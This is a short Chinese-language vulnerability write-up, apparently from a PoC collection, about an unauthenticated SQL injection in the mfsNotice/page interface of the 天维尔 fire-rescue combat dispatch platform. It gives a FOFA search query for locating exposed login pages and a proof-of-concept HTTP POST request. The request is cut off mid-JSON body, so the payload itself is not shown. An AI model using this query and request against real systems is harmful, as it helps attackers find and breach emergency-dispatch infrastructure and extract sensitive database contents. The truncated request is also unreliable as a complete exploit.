0x01 产品简介

天维尔消防救援作战调度平台 是一个采用先进的信息技术和通信技术的系统，能够快速准确地获取和处理突发事件的信息，实现对灾害现场的实时监控和指挥调度，有效提升应急救援工作的能力和水平。

0x02 漏洞概述

天维尔消防救援作战调度平台 mfsNotice/page 接口处存在SQL注入漏洞，未经身份验证的攻击者可利用此漏洞获取数据库敏感信息。

0x03 复现环境

FOFA：body="天维尔信息科技股份有限公司" && title=="登入"

0x04 漏洞复现

PoC

POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Connection: close{"currentPage":1,"pageSi